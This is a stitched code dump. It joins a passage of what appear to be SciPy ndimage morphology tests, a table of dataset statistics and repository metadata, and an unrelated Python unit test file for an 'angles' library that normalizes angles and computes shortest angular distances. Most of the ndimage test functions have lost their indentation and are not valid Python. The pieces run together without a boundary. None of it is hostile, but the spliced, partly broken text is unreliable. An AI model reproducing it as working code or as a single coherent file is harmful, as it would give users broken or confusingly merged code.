                            [0, 0, 1, 0, 0, 1, 0, 0],
                            [0, 0, 1, 0, 0, 1, 0, 0],
                            [0, 0, 1, 1, 1, 1, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0]], bool)
        out = ndimage.binary_fill_holes(data)
        assert_array_almost_equal(out, expected)
    def test_binary_fill_holes02(self):
        """Filling a closed octagonal ring produces a solid octagon."""
        expected = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 1, 1, 0, 0, 0],
                                [0, 0, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 0, 0],
                                [0, 0, 0, 1, 1, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], bool)
        data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 1, 1, 0, 0, 0],
                            [0, 0, 1, 0, 0, 1, 0, 0],
                            [0, 0, 1, 0, 0, 1, 0, 0],
                            [0, 0, 1, 0, 0, 1, 0, 0],
                            [0, 0, 0, 1, 1, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0]], bool)
        out = ndimage.binary_fill_holes(data)
        assert_array_almost_equal(out, expected)
    def test_binary_fill_holes03(self):
        """Two separate shapes with enclosed holes are both filled."""
        expected = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 1, 0, 0, 0, 0, 0],
                                [0, 1, 1, 1, 0, 1, 1, 1],
                                [0, 1, 1, 1, 0, 1, 1, 1],
                                [0, 1, 1, 1, 0, 1, 1, 1],
                                [0, 0, 1, 0, 0, 1, 1, 1],
                                [0, 0, 0, 0, 0, 0, 0, 0]], bool)
        data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 1, 0, 0, 0, 0, 0],
                            [0, 1, 0, 1, 0, 1, 1, 1],
                            [0, 1, 0, 1, 0, 1, 0, 1],
                            [0, 1, 0, 1, 0, 1, 0, 1],
                            [0, 0, 1, 0, 0, 1, 1, 1],
                            [0, 0, 0, 0, 0, 0, 0, 0]], bool)
        out = ndimage.binary_fill_holes(data)
        assert_array_almost_equal(out, expected)
def test_grey_erosion01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.grey_erosion(array, footprint=footprint)
assert_array_almost_equal([[2, 2, 1, 1, 1],
[2, 3, 1, 3, 1],
[5, 5, 3, 3, 1]], output)
def test_grey_erosion01_overlap(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
ndimage.grey_erosion(array, footprint=footprint, output=array)
assert_array_almost_equal([[2, 2, 1, 1, 1],
[2, 3, 1, 3, 1],
[5, 5, 3, 3, 1]], array)
def test_grey_erosion02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
output = ndimage.grey_erosion(array, footprint=footprint,
structure=structure)
assert_array_almost_equal([[2, 2, 1, 1, 1],
[2, 3, 1, 3, 1],
[5, 5, 3, 3, 1]], output)
def test_grey_erosion03(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[1, 1, 1], [1, 1, 1]]
output = ndimage.grey_erosion(array, footprint=footprint,
structure=structure)
assert_array_almost_equal([[1, 1, 0, 0, 0],
[1, 2, 0, 2, 0],
[4, 4, 2, 2, 0]], output)
def test_grey_dilation01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[0, 1, 1], [1, 0, 1]]
output = ndimage.grey_dilation(array, footprint=footprint)
assert_array_almost_equal([[7, 7, 9, 9, 5],
[7, 9, 8, 9, 7],
[8, 8, 8, 7, 7]], output)
def test_grey_dilation02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[0, 1, 1], [1, 0, 1]]
structure = [[0, 0, 0], [0, 0, 0]]
output = ndimage.grey_dilation(array, footprint=footprint,
structure=structure)
assert_array_almost_equal([[7, 7, 9, 9, 5],
[7, 9, 8, 9, 7],
[8, 8, 8, 7, 7]], output)
def test_grey_dilation03(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[0, 1, 1], [1, 0, 1]]
structure = [[1, 1, 1], [1, 1, 1]]
output = ndimage.grey_dilation(array, footprint=footprint,
structure=structure)
assert_array_almost_equal([[8, 8, 10, 10, 6],
[8, 10, 9, 10, 8],
[9, 9, 9, 8, 8]], output)
def test_grey_opening01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
tmp = ndimage.grey_erosion(array, footprint=footprint)
expected = ndimage.grey_dilation(tmp, footprint=footprint)
output = ndimage.grey_opening(array, footprint=footprint)
assert_array_almost_equal(expected, output)
def test_grey_opening02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp = ndimage.grey_erosion(array, footprint=footprint,
structure=structure)
expected = ndimage.grey_dilation(tmp, footprint=footprint,
structure=structure)
output = ndimage.grey_opening(array, footprint=footprint,
structure=structure)
assert_array_almost_equal(expected, output)
def test_grey_closing01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
tmp = ndimage.grey_dilation(array, footprint=footprint)
expected = ndimage.grey_erosion(tmp, footprint=footprint)
output = ndimage.grey_closing(array, footprint=footprint)
assert_array_almost_equal(expected, output)
def test_grey_closing02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp = ndimage.grey_dilation(array, footprint=footprint,
structure=structure)
expected = ndimage.grey_erosion(tmp, footprint=footprint,
structure=structure)
output = ndimage.grey_closing(array, footprint=footprint,
structure=structure)
assert_array_almost_equal(expected, output)
def test_morphological_gradient01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp1 = ndimage.grey_dilation(array, footprint=footprint,
structure=structure)
tmp2 = ndimage.grey_erosion(array, footprint=footprint,
structure=structure)
expected = tmp1 - tmp2
output = numpy.zeros(array.shape, array.dtype)
ndimage.morphological_gradient(array, footprint=footprint,
structure=structure, output=output)
assert_array_almost_equal(expected, output)
def test_morphological_gradient02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp1 = ndimage.grey_dilation(array, footprint=footprint,
structure=structure)
tmp2 = ndimage.grey_erosion(array, footprint=footprint,
structure=structure)
expected = tmp1 - tmp2
output = ndimage.morphological_gradient(array, footprint=footprint,
structure=structure)
assert_array_almost_equal(expected, output)
def test_morphological_laplace01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp1 = ndimage.grey_dilation(array, footprint=footprint,
structure=structure)
tmp2 = ndimage.grey_erosion(array, footprint=footprint,
structure=structure)
expected = tmp1 + tmp2 - 2 * array
output = numpy.zeros(array.shape, array.dtype)
ndimage.morphological_laplace(array, footprint=footprint,
structure=structure, output=output)
assert_array_almost_equal(expected, output)
def test_morphological_laplace02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp1 = ndimage.grey_dilation(array, footprint=footprint,
structure=structure)
tmp2 = ndimage.grey_erosion(array, footprint=footprint,
structure=structure)
expected = tmp1 + tmp2 - 2 * array
output = ndimage.morphological_laplace(array, footprint=footprint,
structure=structure)
assert_array_almost_equal(expected, output)
def test_white_tophat01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp = ndimage.grey_opening(array, footprint=footprint,
structure=structure)
expected = array - tmp
output = numpy.zeros(array.shape, array.dtype)
ndimage.white_tophat(array, footprint=footprint,
structure=structure, output=output)
assert_array_almost_equal(expected, output)
def test_white_tophat02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp = ndimage.grey_opening(array, footprint=footprint,
structure=structure)
expected = array - tmp
output = ndimage.white_tophat(array, footprint=footprint,
structure=structure)
assert_array_almost_equal(expected, output)
def test_white_tophat03(self):
array = numpy.array([[1, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 1]], dtype=numpy.bool_)
structure = numpy.ones((3, 3), dtype=numpy.bool_)
expected = numpy.array([[0, 1, 1, 0, 0, 0, 0],
[1, 0, 0, 1, 1, 1, 0],
[1, 0, 0, 1, 1, 1, 0],
[0, 1, 1, 0, 0, 0, 1],
[0, 1, 1, 0, 1, 0, 1],
[0, 1, 1, 0, 0, 0, 1],
[0, 0, 0, 1, 1, 1, 1]], dtype=numpy.bool_)
output = ndimage.white_tophat(array, structure=structure)
assert_array_equal(expected, output)
def test_white_tophat04(self):
array = numpy.eye(5, dtype=numpy.bool_)
structure = numpy.ones((3, 3), dtype=numpy.bool_)
# Check that type mismatch is properly handled
output = numpy.empty_like(array, dtype=numpy.float64)
ndimage.white_tophat(array, structure=structure, output=output)
def test_black_tophat01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp = ndimage.grey_closing(array, footprint=footprint,
structure=structure)
expected = tmp - array
output = numpy.zeros(array.shape, array.dtype)
ndimage.black_tophat(array, footprint=footprint,
structure=structure, output=output)
assert_array_almost_equal(expected, output)
def test_black_tophat02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp = ndimage.grey_closing(array, footprint=footprint,
structure=structure)
expected = tmp - array
output = ndimage.black_tophat(array, footprint=footprint,
structure=structure)
assert_array_almost_equal(expected, output)
def test_black_tophat03(self):
array = numpy.array([[1, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 1]], dtype=numpy.bool_)
structure = numpy.ones((3, 3), dtype=numpy.bool_)
expected = numpy.array([[0, 1, 1, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 1, 0, 1],
[1, 0, 0, 0, 0, 0, 1],
[1, 1, 1, 1, 1, 1, 0]], dtype=numpy.bool_)
output = ndimage.black_tophat(array, structure=structure)
assert_array_equal(expected, output)
def test_black_tophat04(self):
array = numpy.eye(5, dtype=numpy.bool_)
structure = numpy.ones((3, 3), dtype=numpy.bool_)
# Check that type mismatch is properly handled
output = numpy.empty_like(array, dtype=numpy.float64)
ndimage.black_tophat(array, structure=structure, output=output)
def test_hit_or_miss01(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 1, 0, 0, 0],
[1, 1, 1, 0, 0],
[0, 1, 0, 1, 1],
[0, 0, 1, 1, 1],
[0, 1, 1, 1, 0],
[0, 1, 1, 1, 1],
[0, 1, 1, 1, 1],
[0, 0, 0, 0, 0]], type_)
out = numpy.zeros(data.shape, bool)
ndimage.binary_hit_or_miss(data, struct, output=out)
assert_array_almost_equal(expected, out)
def test_hit_or_miss02(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 1, 0, 0, 1, 1, 1, 0],
[1, 1, 1, 0, 0, 1, 0, 0],
[0, 1, 0, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_hit_or_miss(data, struct)
assert_array_almost_equal(expected, out)
def test_hit_or_miss03(self):
struct1 = [[0, 0, 0],
[1, 1, 1],
[0, 0, 0]]
struct2 = [[1, 1, 1],
[0, 0, 0],
[1, 1, 1]]
expected = [[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 1, 0, 0, 1, 1, 1, 0],
[1, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 1, 1, 0],
[0, 0, 0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_hit_or_miss(data, struct1, struct2)
assert_array_almost_equal(expected, out)
class TestDilateFix:
    """Checks grey_dilation against binary_dilation on a tiny uint8 image."""

    def setup_method(self):
        # Small image with a two-pixel blob; its 3x3 binary dilation is the
        # reference both tests compare against.
        self.array = numpy.array([[0, 0, 0, 0, 0],
                                  [0, 0, 0, 0, 0],
                                  [0, 0, 0, 1, 0],
                                  [0, 0, 1, 1, 0],
                                  [0, 0, 0, 0, 0]], dtype=numpy.uint8)
        self.sq3x3 = numpy.ones((3, 3))
        binary = ndimage.binary_dilation(self.array, structure=self.sq3x3)
        self.dilated3x3 = binary.view(numpy.uint8)

    def test_dilation_square_structure(self):
        got = ndimage.grey_dilation(self.array, structure=self.sq3x3)
        # +1 accounts for difference between grey and binary dilation
        assert_array_almost_equal(got, self.dilated3x3 + 1)

    def test_dilation_scalar_size(self):
        # A scalar size builds a flat footprint, so results match binary dilation.
        got = ndimage.grey_dilation(self.array, size=3)
        assert_array_almost_equal(got, self.dilated3x3)
class TestBinaryOpeningClosing:
    """Verifies the extended binary_opening/closing signatures keep old results."""

    def setup_method(self):
        # 3x3 solid square plus an isolated corner pixel; the legacy
        # positional-argument calls provide the reference results.
        img = numpy.zeros((5, 5), dtype=bool)
        img[1:4, 1:4] = True
        img[4, 4] = True
        self.array = img
        self.sq3x3 = numpy.ones((3, 3))
        self.opened_old = ndimage.binary_opening(self.array, self.sq3x3,
                                                 1, None, 0)
        self.closed_old = ndimage.binary_closing(self.array, self.sq3x3,
                                                 1, None, 0)

    def test_opening_new_arguments(self):
        # Passing the newer output/origin/brute_force arguments must not
        # change the result of binary_opening.
        got = ndimage.binary_opening(self.array, self.sq3x3, 1, None,
                                     0, None, 0, False)
        assert_array_equal(got, self.opened_old)

    def test_closing_new_arguments(self):
        # Same invariance check for binary_closing.
        got = ndimage.binary_closing(self.array, self.sq3x3, 1, None,
                                     0, None, 0, False)
        assert_array_equal(got, self.closed_old)
| 44.09297
| 94
| 0.408964
| 27,811
| 211,999
| 3.014167
| 0.027903
| 0.12533
| 0.156751
| 0.17727
| 0.885979
| 0.867071
| 0.844895
| 0.824818
| 0.798704
| 0.778973
| 0
| 0.138959
| 0.443535
| 211,999
| 4,807
| 95
| 44.102143
| 0.57162
| 0.014392
| 0
| 0.744686
| 0
| 0
| 0.003816
| 0
| 0
| 0
| 0
| 0
| 0.109087
| 1
| 0.088764
| false
| 0
| 0.001869
| 0.006307
| 0.098342
| 0.023593
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
13b6a41b73f1b10f46f8b2be70dbdc97806b3e1c
| 14,706
|
py
|
Python
|
src/workspace/src/angles/test/utest.py
|
glabmoris/Poseidon
|
801dad37ab49adc1a31ccfc1e551c02676ad77c0
|
[
"MIT"
] | 4
|
2021-04-21T05:20:23.000Z
|
2022-02-28T21:20:25.000Z
|
src/workspace/src/angles/test/utest.py
|
glabmoris/Poseidon
|
801dad37ab49adc1a31ccfc1e551c02676ad77c0
|
[
"MIT"
] | 38
|
2021-09-07T16:39:14.000Z
|
2022-03-15T13:41:07.000Z
|
src/workspace/src/angles/test/utest.py
|
glabmoris/Poseidon
|
801dad37ab49adc1a31ccfc1e551c02676ad77c0
|
[
"MIT"
] | 9
|
2021-04-01T15:34:43.000Z
|
2021-11-09T19:07:08.000Z
|
#!/usr/bin/env python
#*********************************************************************
# Software License Agreement (BSD License)
#
# Copyright (c) 2015, Bossa Nova Robotics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Bossa Nova Robotics nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#********************************************************************/
from angles import normalize_angle_positive, normalize_angle, shortest_angular_distance, two_pi_complement, shortest_angular_distance_with_limits, shortest_angular_distance_with_large_limits
from angles import _find_min_max_delta
import sys
import unittest
from math import pi, fabs
## A sample python unit test
class TestAngles(unittest.TestCase):
    """Unit tests for the `angles` helper functions (normalization, shortest
    angular distance with and without joint limits, and internal helpers)."""

    def test_shortestDistanceWithLimits(self):
        # First return value is a flag: True when the motion can stay inside
        # the [lower, upper] limit interval, False otherwise.
        result, shortest_angle = shortest_angular_distance_with_limits(-0.5, 0.5,-0.25,0.25)
        self.assertFalse(result)
        result, shortest_angle = shortest_angular_distance_with_limits(-0.5, 0.5,0.25,0.25)
        self.assertFalse(result)
        # Inverted limits (lower > upper): the long way around is required.
        result, shortest_angle = shortest_angular_distance_with_limits(-0.5, 0.5,0.25,-0.25)
        self.assertTrue(result)
        self.assertAlmostEqual(shortest_angle, -2*pi+1.0)
        result, shortest_angle = shortest_angular_distance_with_limits(0.5, 0.5,0.25,-0.25)
        self.assertTrue(result)
        self.assertAlmostEqual(shortest_angle, 0)
        result, shortest_angle = shortest_angular_distance_with_limits(0.5, 0,0.25,-0.25)
        self.assertFalse(result)
        self.assertAlmostEqual(shortest_angle, -0.5)
        result, shortest_angle = shortest_angular_distance_with_limits(-0.5, 0,0.25,-0.25)
        self.assertFalse(result)
        self.assertAlmostEqual(shortest_angle, 0.5)
        result, shortest_angle = shortest_angular_distance_with_limits(-0.2,0.2,0.25,-0.25)
        self.assertFalse(result)
        self.assertAlmostEqual(shortest_angle, -2*pi+0.4)
        result, shortest_angle = shortest_angular_distance_with_limits(0.2,-0.2,0.25,-0.25)
        self.assertFalse(result)
        self.assertAlmostEqual(shortest_angle,2*pi-0.4)
        result, shortest_angle = shortest_angular_distance_with_limits(0.2,0,0.25,-0.25)
        self.assertFalse(result)
        self.assertAlmostEqual(shortest_angle,2*pi-0.2)
        result, shortest_angle = shortest_angular_distance_with_limits(-0.2,0,0.25,-0.25)
        self.assertFalse(result)
        self.assertAlmostEqual(shortest_angle,-2*pi+0.2)
        result, shortest_angle = shortest_angular_distance_with_limits(-0.25,-0.5,0.25,-0.25)
        self.assertTrue(result)
        self.assertAlmostEqual(shortest_angle,-0.25)
        result, shortest_angle = shortest_angular_distance_with_limits(-0.25,0.5,0.25,-0.25)
        self.assertTrue(result)
        self.assertAlmostEqual(shortest_angle,-2*pi+0.75)
        # Start just outside the wrapped boundary.
        result, shortest_angle = shortest_angular_distance_with_limits(-0.2500001,0.5,0.25,-0.25)
        self.assertTrue(result)
        self.assertAlmostEqual(shortest_angle,-2*pi+0.5+0.2500001)
        result, shortest_angle = shortest_angular_distance_with_limits(-0.6, 0.5,-0.25,0.25)
        self.assertFalse(result)
        result, shortest_angle = shortest_angular_distance_with_limits(-0.5, 0.6,-0.25,0.25)
        self.assertFalse(result)
        result, shortest_angle = shortest_angular_distance_with_limits(-0.6, 0.75,-0.25,0.3)
        self.assertFalse(result)
        result, shortest_angle = shortest_angular_distance_with_limits(-0.6, pi*3.0/4.0,-0.25,0.3)
        self.assertFalse(result)
        # Full-range limits: -pi to pi is always reachable with zero motion.
        result, shortest_angle = shortest_angular_distance_with_limits(-pi, pi,-pi,pi)
        self.assertTrue(result)
        self.assertAlmostEqual(shortest_angle,0.0)

    def test_shortestDistanceWithLargeLimits(self):
        # Variant that supports limit intervals wider than 2*pi.
        # 'delta' is valid
        result, shortest_angle = shortest_angular_distance_with_large_limits(0, 10.5*pi, -2*pi, 2*pi)
        self.assertTrue(result)
        self.assertAlmostEqual(shortest_angle, 0.5*pi)
        # 'delta' is not valid, but 'delta_2pi' is
        result, shortest_angle = shortest_angular_distance_with_large_limits(0, 10.5*pi, -2*pi, 0.1*pi)
        self.assertTrue(result)
        self.assertAlmostEqual(shortest_angle, -1.5*pi)
        # neither 'delta' nor 'delta_2pi' are valid
        result, shortest_angle = shortest_angular_distance_with_large_limits(2*pi, pi, 2*pi-0.1, 2*pi+0.1)
        self.assertFalse(result)
        # start position outside limits
        result, shortest_angle = shortest_angular_distance_with_large_limits(10.5*pi, 0, -2*pi, 2*pi)
        self.assertFalse(result)
        # invalid limits (lower > upper)
        result, shortest_angle = shortest_angular_distance_with_large_limits(0, 0.1, 2*pi, -2*pi)
        self.assertFalse(result)
        # specific test case
        result, shortest_angle = shortest_angular_distance_with_large_limits(0.999507, 1.0, -20*pi, 20*pi)
        self.assertTrue(result)
        self.assertAlmostEqual(shortest_angle, 0.000493)

    def test_normalize_angle_positive(self):
        # normalize_angle_positive maps any angle into [0, 2*pi).
        self.assertAlmostEqual(0, normalize_angle_positive(0))
        self.assertAlmostEqual(pi, normalize_angle_positive(pi))
        self.assertAlmostEqual(0, normalize_angle_positive(2*pi))
        self.assertAlmostEqual(pi, normalize_angle_positive(3*pi))
        self.assertAlmostEqual(0, normalize_angle_positive(4*pi))
        self.assertAlmostEqual(0, normalize_angle_positive(-0))
        self.assertAlmostEqual(pi, normalize_angle_positive(-pi))
        self.assertAlmostEqual(0, normalize_angle_positive(-2*pi))
        self.assertAlmostEqual(pi, normalize_angle_positive(-3*pi))
        self.assertAlmostEqual(0, normalize_angle_positive(-4*pi))
        self.assertAlmostEqual(0, normalize_angle_positive(-0))
        self.assertAlmostEqual(3*pi/2, normalize_angle_positive(-pi/2))
        self.assertAlmostEqual(pi, normalize_angle_positive(-pi))
        self.assertAlmostEqual(pi/2, normalize_angle_positive(-3*pi/2))
        self.assertAlmostEqual(0, normalize_angle_positive(-4*pi/2))
        self.assertAlmostEqual(0, normalize_angle_positive(0))
        self.assertAlmostEqual(pi/2, normalize_angle_positive(pi/2))
        self.assertAlmostEqual(pi/2, normalize_angle_positive(5*pi/2))
        self.assertAlmostEqual(pi/2, normalize_angle_positive(9*pi/2))
        self.assertAlmostEqual(pi/2, normalize_angle_positive(-3*pi/2))

    def test_normalize_angle(self):
        # normalize_angle maps any angle into (-pi, pi].
        self.assertAlmostEqual(0, normalize_angle(0))
        self.assertAlmostEqual(pi, normalize_angle(pi))
        self.assertAlmostEqual(0, normalize_angle(2*pi))
        self.assertAlmostEqual(pi, normalize_angle(3*pi))
        self.assertAlmostEqual(0, normalize_angle(4*pi))
        self.assertAlmostEqual(0, normalize_angle(-0))
        self.assertAlmostEqual(pi, normalize_angle(-pi))
        self.assertAlmostEqual(0, normalize_angle(-2*pi))
        self.assertAlmostEqual(pi, normalize_angle(-3*pi))
        self.assertAlmostEqual(0, normalize_angle(-4*pi))
        self.assertAlmostEqual(0, normalize_angle(-0))
        self.assertAlmostEqual(-pi/2, normalize_angle(-pi/2))
        self.assertAlmostEqual(pi, normalize_angle(-pi))
        self.assertAlmostEqual(pi/2, normalize_angle(-3*pi/2))
        self.assertAlmostEqual(0, normalize_angle(-4*pi/2))
        self.assertAlmostEqual(0, normalize_angle(0))
        self.assertAlmostEqual(pi/2, normalize_angle(pi/2))
        self.assertAlmostEqual(pi/2, normalize_angle(5*pi/2))
        self.assertAlmostEqual(pi/2, normalize_angle(9*pi/2))
        self.assertAlmostEqual(pi/2, normalize_angle(-3*pi/2))

    def test_shortest_angular_distance(self):
        # Signed shortest rotation from the first angle to the second.
        self.assertAlmostEqual(pi/2, shortest_angular_distance(0, pi/2))
        self.assertAlmostEqual(-pi/2, shortest_angular_distance(0, -pi/2))
        self.assertAlmostEqual(-pi/2, shortest_angular_distance(pi/2, 0))
        self.assertAlmostEqual(pi/2, shortest_angular_distance(-pi/2, 0))
        self.assertAlmostEqual(-pi/2, shortest_angular_distance(pi, pi/2))
        self.assertAlmostEqual(pi/2, shortest_angular_distance(pi, -pi/2))
        self.assertAlmostEqual(pi/2, shortest_angular_distance(pi/2, pi))
        self.assertAlmostEqual(-pi/2, shortest_angular_distance(-pi/2, pi))
        self.assertAlmostEqual(-pi/2, shortest_angular_distance(5*pi, pi/2))
        self.assertAlmostEqual(pi/2, shortest_angular_distance(7*pi, -pi/2))
        self.assertAlmostEqual(pi/2, shortest_angular_distance(9*pi/2, pi))
        self.assertAlmostEqual(pi/2, shortest_angular_distance(-3*pi/2, pi))
        # Backside wrapping
        self.assertAlmostEqual(-pi/2, shortest_angular_distance(-3*pi/4, 3*pi/4))
        self.assertAlmostEqual(pi/2, shortest_angular_distance(3*pi/4, -3*pi/4))

    def test_two_pi_complement(self):
        # two_pi_complement(a) is the same rotation reached the other way
        # around the circle (a - sign(a)*2*pi, with 0 mapping to 2*pi).
        epsilon = 1e-9
        self.assertAlmostEqual(two_pi_complement(0), 2*pi)
        self.assertAlmostEqual(two_pi_complement(2*pi), 0)
        self.assertAlmostEqual(two_pi_complement(-2*pi), 0)
        self.assertAlmostEqual(two_pi_complement(2*pi-epsilon), -epsilon)
        self.assertAlmostEqual(two_pi_complement(-2*pi+epsilon), epsilon)
        self.assertAlmostEqual(two_pi_complement(pi/2), -3*pi/2)
        self.assertAlmostEqual(two_pi_complement(pi), -pi)
        self.assertAlmostEqual(two_pi_complement(-pi), pi)
        self.assertAlmostEqual(two_pi_complement(-pi/2), 3*pi/2)
        self.assertAlmostEqual(two_pi_complement(3*pi), -pi)
        self.assertAlmostEqual(two_pi_complement(-3.0*pi), pi)
